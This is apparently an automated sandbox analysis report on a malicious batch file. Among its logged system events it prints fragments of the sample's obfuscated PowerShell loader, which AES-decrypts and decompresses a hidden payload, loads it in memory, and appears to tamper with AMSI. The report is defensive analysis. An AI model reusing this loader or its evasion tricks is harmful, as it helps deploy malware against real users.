Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: loadperf.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\wbem\WMIADAP.exe

File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 1.cmd

Static file information: File size 5214429 > 1048576

Source:	Binary string: System.Configuration.Install.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdbMZ source: WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.DirectoryServices.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.Powershell.PSReadline.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Numerics.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.DirectoryServices.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ServiceProcess.pdbame="P@ source: WER3551.tmp.dmp.28.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.ServiceProcess.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: mscorlib.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDB source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.ServiceProcess.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.Install.pdb( source: WER3551.tmp.dmp.28.dr
Source:	Binary string: System.Configuration.Install.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2998816420.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.DirectoryServices.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.CSharp.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.pdbP source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.pdbP4 source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.ni.pdbRSDSC source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Xml.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2998816420.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ServiceProcess.pdb source: WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Numerics.ni.pdbRSDSautg source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.pdbH source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.Automation.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.Automation.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdbp^y source: WER3551.tmp.dmp.28.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Drawing.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.Automation.pdb3 source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Transactions.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.pdbiy source: WER3551.tmp.dmp.28.dr
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Transactions.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Transactions.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Numerics.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: DetailSequence=1DetailTotal=1SequenceNumber=27UserId=WORKGROUP\SYSTEMHostName=ConsoleHostHostVersion=5.1.19041.1682HostId=fa30d40e-d0d2-4405-85db-7bb3a1a8c1b8HostApplication=C:\Windows\System32\Window
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer($PWtaGkrbiCHSQK,$crUBwWNbWsKMjsxdFIT).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$SjReXwPFwLrQCguSY=$AmujSZCroNXavL.Invo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FT'+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](114)+''+[Char](98)+''+[Char](120)+''+[Char](

Obfuscated command line found

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnY

Suspicious command line found

Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq 